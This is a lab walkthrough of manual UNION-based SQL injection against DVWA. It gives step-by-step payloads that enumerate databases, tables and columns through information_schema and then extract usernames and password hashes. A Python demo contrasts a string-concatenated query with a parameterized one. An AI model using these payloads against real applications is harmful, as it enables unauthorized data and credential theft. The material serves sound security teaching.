
Manual SQL Injection Attack

Lab Set up

  • Virtualization using Oracle VirtualBox

  • Attacker's System: Kali Linux

  • Target System: Metasploitable 2


1. In Kali Linux --> browser --> Visit Target Website.

Ex. DVWA (Damn Vulnerable Web Application). It is integrated in Metasploitable 2. Just enter the target's IP address in the Kali Linux browser and click on DVWA. Log in with username 'admin' and password 'password'. Now go to DVWA Security, set the security level to 'low' and submit. This is done so that the attack will work.


2. Click on the SQL Injection tab.


3. First check whether the response is coming from the database server. To check this, simply type a single quote, i.e. ( ' ), in the input field to see whether the page is vulnerable to SQL injection. If it is, the error message may also reveal which database system is used at the back end. This is known as error-based SQL injection.


4. It will show that the back end is a MySQL database, so we will use # for commenting.


5. Now we will try to inject a SQL query into the input field. We will use the 'union' operator. But for the 'union' operator to work, the number of columns in both queries must be equal. Hence we will find the number of columns first.


6. Now find the total number of columns. We have to start from 1 and keep increasing the count until we get a result.

Ex. 'union select 1 #


OR


Ex. 'union select 1,2 #


Note: In the MySQL database system there is a database called 'information_schema'. It contains metadata about all the other databases in the database system.

Inside 'information_schema' there are two important tables: 'tables' and 'columns'.

Inside the table 'tables' there are two relevant columns, 'table_name' and 'table_schema'. Inside the table 'columns' there are three relevant columns, 'table_name', 'table_schema' and 'column_name'.

Fig. information_schema database



7. Thus we got that there are 2 columns. Now find the database name.

Ex. 'union select 1,database() #


Now you will get all databases in the database system. We will go through them one by one or pick the relevant one logically.

8. Now find the table names in the database 'dvwa'.

Ex. 'union select table_name,1 from information_schema.tables where table_schema='dvwa' #

Here table_schema is nothing but the name of the database obtained in the previous step.

Now you will get all tables from the database 'dvwa'.

9. Now find the column names in the table 'users'.

Ex. 'union select column_name,1 from information_schema.columns where table_name='users' #

Here table_name is nothing but the name of the table obtained in the previous step (table_schema holds the database name, so filtering on table_schema='users' would match nothing).


Now you will get all columns from the table 'users'.

10. Now display the username and password, i.e. the records in those columns.

Ex. 'union select user,password from users #

Now you will get all the records from the table 'users' for the columns 'user' and 'password'.
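To see why the 'low' security level is exploitable and what the fix looks like, here is an added example (not part of the original page or of DVWA) that runs the step-10 payload against a constructed in-memory SQLite stand-in for the users table, once through a string-concatenated query and once through a parameterized one. The table layout, row contents and password placeholders are assumptions, and SQLite's '-- ' comment marker stands in for MySQL's '#'.

```python
import sqlite3

# Constructed stand-in for DVWA's users table: assumed column names and
# placeholder password values. It is not DVWA's real schema or data.
SCHEMA = """
CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT,
                    user TEXT, password TEXT);
INSERT INTO users VALUES (1, 'admin', 'admin', 'admin', 'HASH_A_PLACEHOLDER');
INSERT INTO users VALUES (2, 'Gordon', 'Brown', 'gordonb', 'HASH_B_PLACEHOLDER');
"""

# The page's step-10 payload. SQLite has no '#' comment marker, so the
# MySQL '#' is replaced by '-- ' here; the mechanism is otherwise the same.
PAYLOAD = "' union select user,password from users -- "

def fresh_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn

def lookup_vulnerable(conn, user_id):
    # String concatenation, the pattern behind DVWA's 'low' level: the
    # request value is spliced into the SQL text, so a quote closes the
    # literal and everything after it is parsed as SQL grammar.
    sql = ("SELECT first_name, last_name FROM users WHERE user_id = '"
           + user_id + "'")
    return conn.execute(sql).fetchall()

def lookup_parameterized(conn, user_id):
    # Bound parameter: the value travels separately from the statement,
    # so quotes, UNION and comment markers inside it stay plain data.
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(sql, (user_id,)).fetchall()

def demo():
    # Same two inputs through both code paths; rows sorted for stable output.
    conn = fresh_db()
    return {
        "normal_vuln": lookup_vulnerable(conn, "1"),
        "payload_vuln": sorted(lookup_vulnerable(conn, PAYLOAD)),
        "normal_safe": lookup_parameterized(conn, "1"),
        "payload_safe": lookup_parameterized(conn, PAYLOAD),
    }

if __name__ == "__main__":
    for name, rows in demo().items():
        print(name, rows)
```

The concatenated path returns every user/password pair for the payload, while the parameterized path treats the same text as a user_id that matches no row.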

